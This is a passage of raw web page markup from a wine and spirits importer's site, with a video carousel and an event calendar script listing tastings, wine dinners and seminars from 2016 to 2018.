/> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/kRKs_dDfyTc?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/Y7amVCTNw8w?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/07/Screen-Shot-2015-07-28-at-4.44.33-PM-220x130.png" class="attachment-video_images wp-post-image" alt="lucano" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/THfND2Cjn3E?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/07/vermouth-220x130.png" class="attachment-video_images wp-post-image" alt="vermouth" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/nhyER6avPII?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/nUbaqbgMab8?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/06/movia-puro-220x130.png" class="attachment-video_images wp-post-image" alt="movia puro" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/pubUIdUZZR4?autoplay=1"> <span class="bg_video_btn"></span> <img width="195" height="130" src="http://domaineselect.com/wp-content/uploads/2015/06/Logo-Varnelli_200.jpg" class="attachment-video_images wp-post-image" alt="VarnelliLogo" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/4Ec0KTPYPHQ?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="110" src="http://domaineselect.com/wp-content/uploads/2015/06/Unknown-11-220x110.jpeg" class="attachment-video_images wp-post-image" alt="wp" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/5hpdedIBjcw?autoplay=1"> <span class="bg_video_btn"></span> <img width="195" height="130" src="http://domaineselect.com/wp-content/uploads/2015/06/MG_1407.jpg" class="attachment-video_images wp-post-image" alt="fantinel" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/l7RehVugEWM?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="110" src="http://domaineselect.com/wp-content/uploads/2015/06/Immagine51-e1433841027866.png" class="attachment-video_images wp-post-image" alt="Immagine5" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/gIGXeRgcxKU?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="109" src="http://domaineselect.com/wp-content/uploads/2015/06/Unknown-2.jpeg" class="attachment-video_images wp-post-image" alt="Armagnac Castarade" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/OpXbpM2EIH8?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="123" src="http://domaineselect.com/wp-content/uploads/2015/06/Unknown-1.jpeg" class="attachment-video_images wp-post-image" alt="Tad Seestedt" /> </a> </div> </div> </div> <strong class="bnt_view_our_philanthropic_activities"><a href="http://domaineselect.com/philanthropicactivities/">View Our Philanthropic Activities</a></strong> </div> <div class="small-col"> <div class="upcoming_box"> <div class="home_title_box iner"> <div class="title_bg"> <strong class="title">UPCOMING</strong> </div> </div> <div class="upcoming_img"> <a href="http://domaineselect.com/producer/omar/"> </a> </div> </div> <div class="home_title_box iner"> <div class="title_bg"> <strong class="title">Social Media</strong> <p style="font-size:13px;text-decoration:underline;"><a href="https://facebook.com/domaineselect" target="blank">See Our Facebook Page</a></p> </div> </div> <div class="sidebar_holder"> <aside id="jr_insta_slider-3" class="widget jr-insta-slider"><h2 class="widget-title">Instagram</h2>No images found</aside> </div> </div> <div class="small-col featured_events_right"> <div class="featured-events"> <div class="home_title_box iner"> <strong class="btn_open_all"><a href="http://domaineselect.com/featured-events/" >open all</a></strong> <div class="title_bg"> <strong class="title">featured events</strong> </div> </div> <script> jQuery(document).ready(function() { jQuery('#calendar').fullCalendar({ defaultDate: '2019-05-16', editable: false, eventLimit: true, // allow "more" link when too many events events: [ { title: 'TALES OF THE COCKTAIL 2018', bg:'http://domaineselect.com/wp-content/uploads/2015/09/CV-symbol_black_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/CV-symbol_black_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/tales-of-the-cocktail-2018/">TALES OF THE COCKTAIL 2018</a><span>Toups South</span>', start: ' 2018-07-19' }, { title: 'DOMAINE SELECT &#038; INTERNATIONAL WINE &#038; SPIRITS', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/domaine-select-international-wine-spirits/">DOMAINE SELECT &#038; INTERNATIONAL WINE &#038; SPIRITS</a><span>BACCHANAL</span>', start: ' 2018-05-15' }, { title: 'DOMAINE SELECT SPIRITS PORTFOLIO SHOW', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/domaine-select-spirits-portfolio-show-2/">DOMAINE SELECT SPIRITS PORTFOLIO SHOW</a><span>THE FALCON AND THE FLAMINGO</span>', start: ' 2018-05-17' }, { title: 'DOMAINE SELECT INDUSTRY HAPPY HOUR WITH TAD CARDUCCI', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/domaine-select-industry-happy-hour-with-tad-carducci-2/">DOMAINE SELECT INDUSTRY HAPPY HOUR WITH TAD CARDUCCI</a><span> OLD GLORY</span>', start: ' 2018-05-17' }, { title: 'APERITIVO &#038; DIGESTIVO WITH TAD CARDUCCI', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/aperitivo-digestivo-with-tad-carducci-2/">APERITIVO &#038; DIGESTIVO WITH TAD CARDUCCI</a><span>CAFÉ ROZE</span>', start: ' 2018-05-17' }, { title: 'DOMAINE SELECT SPIRITS PORTFOLIO SHOW', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/domaine-select-spirits-portfolio-show/">DOMAINE SELECT SPIRITS PORTFOLIO SHOW</a><span>EMPIRE STATE SOUTH</span>', start: ' 2018-05-16' }, { title: 'DOMAINE SELECT INDUSTRY HAPPY HOUR WITH TAD CARDUCCI', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/domaine-select-industry-happy-hour-with-tad-carducci/">DOMAINE SELECT INDUSTRY HAPPY HOUR WITH TAD CARDUCCI</a><span>KIMBALL HOUSE</span>', start: ' 2018-05-16' }, { title: 'APERITIVO &#038; DIGESTIVO WITH TAD CARDUCCI', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/aperitivo-digestivo-with-tad-carducci/">APERITIVO &#038; DIGESTIVO WITH TAD CARDUCCI</a><span>EMPIRE STATE SOUTH</span>', start: ' 2018-05-16' }, { title: 'Borgogno Wine Dinner', bg:'http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/borgogno-wine-dinner/">Borgogno Wine Dinner</a><span>La Tavola</span>', start: ' 2018-06-07' }, { title: 'COS/MOVIA SKIN CONTACT WINE DINNER', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/cosmovia-skin-contact-wine-dinner/">COS/MOVIA SKIN CONTACT WINE DINNER</a><span>Ristorante Chinato</span>', start: ' 2018-04-04' }, { title: 'Springtime in Southern France at Jungle Jim&#8217;s Fairfield', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2018/03/Screen-Shot-2018-03-09-at-11.30.36-AM-100x100.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/springtime-in-southern-france-at-jungle-jims-fairfield/">Springtime in Southern France at Jungle Jim&#8217;s Fairfield</a><span>Jungle Jims Fairfield</span>', start: ' 2018-04-07' }, { title: 'NOLA in SOBE', bg:'http://domaineselect.com/wp-content/uploads/2018/02/Screen-Shot-2018-02-22-at-9.40.jpeg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2018/02/Screen-Shot-2018-02-22-at-9.40-100x100.jpeg" alt="" /> </span><a href="http://domaineselect.com/featured_events/nola-in-sobe/">NOLA in SOBE</a><span>The Loews Hotel in Miami Beach</span>', start: ' 2018-02-24' }, { title: 'Party with Don Ciccio &#038; Figli!', bg:'http://domaineselect.com/wp-content/uploads/2018/02/Screen-Shot-2018-01-30-at-5.02.53-PM1.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2018/02/Screen-Shot-2018-01-30-at-5.02.53-PM-100x100.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/party-with-don-ciccio-figli/">Party with Don Ciccio &#038; Figli!</a><span>Bellina Alimentari / Ponce City Market</span>', start: ' 2018-02-21' }, { title: 'LMCO 2018 Grand Portfolio Tasting', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2016/12/Screen-Shot-2016-12-21-at-4.50.24-PM.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/lmco-2018-grand-portfolio-tasting/">LMCO 2018 Grand Portfolio Tasting</a><span>The Maven Hotel</span>', start: ' 2018-01-29' }, { title: 'DSWS 2018 Florida Grand Portfolio Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/dsws-2018-florida-grand-portfolio-tasting/">DSWS 2018 Florida Grand Portfolio Tasting</a><span>Cantina La Veinte</span>', start: ' 2018-01-24' }, { title: 'DSWS 2018 Grand Portfolio Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/dsws-2018-grand-portfolio-tasting/">DSWS 2018 Grand Portfolio Tasting</a><span>Kimpton Hotel Eventi</span>', start: ' 2018-01-22' }, { title: 'Lucano Unstuff your Turkey Night', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/lucano-unstuff-your-turkey-night/">Lucano Unstuff your Turkey Night</a><span>Macao Trading Co</span>', start: ' 2017-11-20' }, { title: 'Classic &#038; Vintage Holiday Booze Bazaar', bg:'http://domaineselect.com/wp-content/uploads/2015/06/22344102_1090309127773274_479062206974001152_n.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/22344102_1090309127773274_479062206974001152_n-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/classic-vintage-holiday-booze-bazaar/">Classic &#038; Vintage Holiday Booze Bazaar</a><span></span>', start: ' 2017-10-16' }, { title: 'Movia Wine Dinner at Gunter Seeger NY', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-26-at-2.331-100x100.jpeg" alt="" /> </span><a href="http://domaineselect.com/featured_events/movia-wine-dinner-at-gunter-seeger-ny/">Movia Wine Dinner at Gunter Seeger NY</a><span>Gunter Seeger NY</span>', start: ' 2017-10-03' }, { title: 'Don Ciccio &#038; Figli Dinner at The Wooden Table', bg:'http://domaineselect.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-20-at-12.51.32-PM.png', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/don-ciccio-figli-dinner-at-the-wooden-table/">Don Ciccio &#038; Figli Dinner at The Wooden Table</a><span>The Wooden Table </span>', start: ' 2017-09-27' }, { title: 'RUM NIGHT &#8211; SURF STYLE', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-19-at-12.34.56-PM-100x100.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/rum-night-surf-style/">RUM NIGHT &#8211; SURF STYLE</a><span>Surf BBQ & Burger </span>', start: ' 2017-09-29' }, { title: 'Junoon Restaurant Welcomes Michael D&#8217;Souza', bg:'http://domaineselect.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-19-at-12.19.57-PM.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-19-at-12.19.57-PM-100x100.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/junoon-restaurant-welcomes-michael-dsouza/">Junoon Restaurant Welcomes Michael D&#8217;Souza</a><span>Junoon Restaurant </span>', start: ' 2017-09-28' }, { title: 'Amaro Flight Night', bg:'http://domaineselect.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-18-at-5.16.jpeg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-18-at-5.16-100x100.jpeg" alt="" /> </span><a href="http://domaineselect.com/featured_events/amaro-flight-night/">Amaro Flight Night</a><span>Bar Dough </span>', start: ' 2017-09-26' }, { title: 'Harvest Wine &#038; Dine with Chef Nicola', bg:'http://domaineselect.com/wp-content/uploads/2017/09/21558616_10154731753726666_6806851562706252474_n.jpg', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/harvest-wine-dine-with-chef-nicola/">Harvest Wine &#038; Dine with Chef Nicola</a><span>Nicola Restaurant & Bar </span>', start: ' 2017-09-27' }, { title: 'Gordon&#8217;s Welcomes Michael D&#8217;Souza Master Distiller at Paul John Distillery', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-07-at-4.28.27-PM-100x100.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/20438/">Gordon&#8217;s Welcomes Michael D&#8217;Souza Master Distiller at Paul John Distillery</a><span>Gordons Fine Wine & Spirits</span>', start: ' 2017-09-26' }, { title: 'Diplomático Traditions Launch at East Miami', bg:'http://domaineselect.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-07-at-3.50.15-PM.png', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/diplomatico-traditions-launch-at-east-miami/">Diplomático Traditions Launch at East Miami</a><span>Miami East, Sugar Rooftop Bar </span>', start: ' 2017-09-20' }, { title: 'Blinded By the Dark Side', bg:'http://domaineselect.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-07-at-3.25.18-PM.png', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/blinded-by-the-dark-side/">Blinded By the Dark Side</a><span>North Square Oyster</span>', start: ' 2017-09-14' }, { title: 'Ransom Spirits Seminar with Tad Seestedt', bg:'http://domaineselect.com/wp-content/uploads/2017/09/TadSeestedtInvite.jpeg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2017/09/TadSeestedtInvite-100x100.jpeg" alt="" /> </span><a href="http://domaineselect.com/featured_events/ransom-spirits-seminar-with-tad-seestedt/">Ransom Spirits Seminar with Tad Seestedt</a><span></span>', start: ' 2017-09-06' }, { title: 'Somm Slam 2017', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2017/06/Screen-Shot-2017-06-30-at-9.10.30-AM-100x100.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/somm-slam-2017/">Somm Slam 2017</a><span>Monello </span>', start: ' 2017-07-18' }, { title: 'Aspen Food &#038; Wine 2017 &#8211; Diplomatico Suite', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/aspen-food-wine-2017-diplomatico-suite/">Aspen Food &#038; Wine 2017 &#8211; Diplomatico Suite</a><span>Residences at The Little Nell</span>', start: ' 2017-06-15' }, { title: 'Arts &#038; Bubbly in Wynwood', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/arts-bubbly-in-wynwood/">Arts &#038; Bubbly in Wynwood</a><span>The Rubell Family Collection / Charcoal</span>', start: ' 2017-06-13' }, { title: 'Poland Select Wodka Launch Party', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/poland-select-wodka-launch-party/">Poland Select Wodka Launch Party</a><span>Floor 13</span>', start: ' 2017-05-15' }, { title: 'Don Ciccio at Bar Deco', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/don-ciccio-at-bar-deco/">Don Ciccio at Bar Deco</a><span>Bar Deco</span>', start: ' 2017-04-12' }, { title: 'Mexico in a Bottle', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/mexico-in-a-bottle/">Mexico in a Bottle</a><span>Mexican Cultural Institute</span>', start: ' 2017-05-01' }, { title: 'Indian Spirit, Indian Cuisine: A Paul John Whisky Dinner', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/indian-spirit-indian-cuisine-a-paul-john-whisky-dinner/">Indian Spirit, Indian Cuisine: A Paul John Whisky Dinner</a><span>Mandovi Indian Cuisine</span>', start: ' 2017-04-03' }, { title: 'Great Wines of Italy in Miami', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/great-wines-of-italy-in-miami/">Great Wines of Italy in Miami</a><span>The Moore Building</span>', start: ' 2017-03-06' }, { title: 'Cincinnati International Wine Festival &#8211; Robert Kacher Selections', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/cincinnati-international-wine-festival-robert-kacher-selections/">Cincinnati International Wine Festival &#8211; Robert Kacher Selections</a><span>Duke Energy Convention Center Grand Ballrooms, 3rd Floor</span>', start: ' 2017-03-02' }, { title: 'JOURNEY THROUGH THE BEST OF TUSCANY', bg:'http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo2.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/journey-through-the-best-of-tuscany/">JOURNEY THROUGH THE BEST OF TUSCANY</a><span>Martin Brothers</span>', start: ' 2016-12-12' }, { title: 'CHAMPAGNE + THAI!!', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/champagne-thai/">CHAMPAGNE + THAI!!</a><span>Resy</span>', start: ' 2017-03-08' }, { title: '&#8220;An Evening in Umbria&#8221;', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/an-evening-in-umbria/">&#8220;An Evening in Umbria&#8221;</a><span>Chianti II Ristorante</span>', start: ' 2017-03-23' }, { title: 'CHAMPAGNE PHILIPPE GONET MASTERCLASS', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/champagne-philippe-gonet-masterclass/">CHAMPAGNE PHILIPPE GONET MASTERCLASS</a><span>FLORIDA WINE ACADEMY</span>', start: ' 2017-03-02' }, { title: 'The Ultimate Guide to Italian Wine 2017', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/the-ultimate-guide-to-italian-wine-2017/">The Ultimate Guide to Italian Wine 2017</a><span>The Mayflower Hotel</span>', start: ' 2017-03-01' }, { title: 'DSWS 2017 Grand Portfolio Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/dsws-2017-grand-portfolio-tasting/">DSWS 2017 Grand Portfolio Tasting</a><span>Kimpton Hotel Eventi - Floor 2</span>', start: ' 2017-01-24' }, { title: '&#8220;Classic Piedmont&#8221; Italian session with wines from Giacomo Borgogno', bg:'http://domaineselect.com/wp-content/uploads/2016/09/logo-logo.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2016/09/logo-logo-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/classic-piedmont-italian-session-with-wines-from-giacomo-borgogno/">&#8220;Classic Piedmont&#8221; Italian session with wines from Giacomo Borgogno</a><span>Grazianos in Coral Gables, Miami </span>', start: ' 2016-09-22' }, { title: 'Le Train Bleu dinner with DSWS selection of natural wines', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/le-train-bleu-dinner-with-dsws-selection-of-natural-wines/">Le Train Bleu dinner with DSWS selection of natural wines</a><span>Bloomingdales 59th street</span>', start: ' 2016-09-09' }, { title: 'The Launch of the Amaro Lucano Anniversario', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/the-launch-of-the-amaro-lucano-anniversario/">The Launch of the Amaro Lucano Anniversario</a><span>Sons & Daughters NYC</span>', start: ' 2016-09-19' }, { title: 'Los Angeles Food &#038; Wine', bg:'http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/09/DSWS_bassa-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/los-angeles-food-wine-2/">Los Angeles Food &#038; Wine</a><span>Los Angeles</span>', start: ' 2016-08-25' }, { title: 'Vinecraft Fall Portfolio Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/vinecraft-fall-portfolio-tasting/">Vinecraft Fall Portfolio Tasting</a><span></span>', start: ' 2016-09-13' }, { title: 'Robert Kacher Selections Fall Portfolio Tasting', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/robert-kacher-selections-fall-portfolio-tasting/">Robert Kacher Selections Fall Portfolio Tasting</a><span></span>', start: ' 2016-09-12' }, { title: 'Distilleria Varnelli Seminar', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/distilleria-varnelli-seminar/">Distilleria Varnelli Seminar</a><span></span>', start: ' 2016-07-25' }, { title: 'Barista meets Barman Coffee Cocktail Culture', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/barista-meets-barman-coffee-cocktail-culture/">Barista meets Barman Coffee Cocktail Culture</a><span></span>', start: ' 2016-07-22' }, { title: 'The Royal Hour', bg:'http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/cv-icon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/the-royal-hour/">The Royal Hour</a><span>Salon Restaurant by Sucre</span>', start: ' 2016-07-22' }, { title: 'Italian Spirits Dinner', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/italian-spirits-dinner/">Italian Spirits Dinner</a><span>Treo Restaurant</span>', start: ' 2016-07-21' }, { title: 'Classic &#038; Vintage 3rd Annual World Foosball Championship', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/world-foosball-championship/">Classic &#038; Vintage 3rd Annual World Foosball Championship</a><span>The Company Burger</span>', start: ' 2016-07-24' }, { title: 'Freret Street Bar Crawl', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/freret-street-bar-crawl/">Freret Street Bar Crawl</a><span>New Orleans</span>', start: ' 2016-07-24' }, { title: 'Classic &#038; Vintage at Tales of the Cocktail 2016', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/classic-vintage-at-tales-of-the-cocktail-2016/">Classic &#038; Vintage at Tales of the Cocktail 2016</a><span>New Orleans</span>', start: ' 2016-07-19' }, { title: 'The Cocktail Brunch Italiano with Amaro Lucano and Varnelli', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/the-cocktail-brunch-italiano-with-amaro-lucano-and-varnelli/">The Cocktail Brunch Italiano with Amaro Lucano and Varnelli</a><span>Patricks Bar Vin, Hotel Mazarin</span>', start: ' 2016-07-23' }, { title: 'Food &#038; Wine Classic in Aspen &#8211; Tuscan Vertical Experience', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen-tuscan-vertical-experience/">Food &#038; Wine Classic in Aspen &#8211; Tuscan Vertical Experience</a><span></span>', start: ' 2016-06-18' }, { title: 'Food &#038; Wine Classic in Aspen &#8211; Recovery Room', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen-recovery-room/">Food &#038; Wine Classic in Aspen &#8211; Recovery Room</a><span>DSWS House</span>', start: ' 2016-06-19' }, { title: 'Food &#038; Wine Classic in Aspen &#8211; Mexico in a Bottle', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen-mexico-in-a-bottle/">Food &#038; Wine Classic in Aspen &#8211; Mexico in a Bottle</a><span></span>', start: ' 2016-06-17' }, { title: 'Food &#038; Wine Classic in Aspen &#8211; Diplo at Justice Snow&#8217;s', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen-diplo-at-justice-snows/">Food &#038; Wine Classic in Aspen &#8211; Diplo at Justice Snow&#8217;s</a><span></span>', start: ' 2016-06-17' }, { title: 'Food &#038; Wine Classic in Aspen &#8211; Happy Hour at Jimmy&#8217;s Bodega', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img 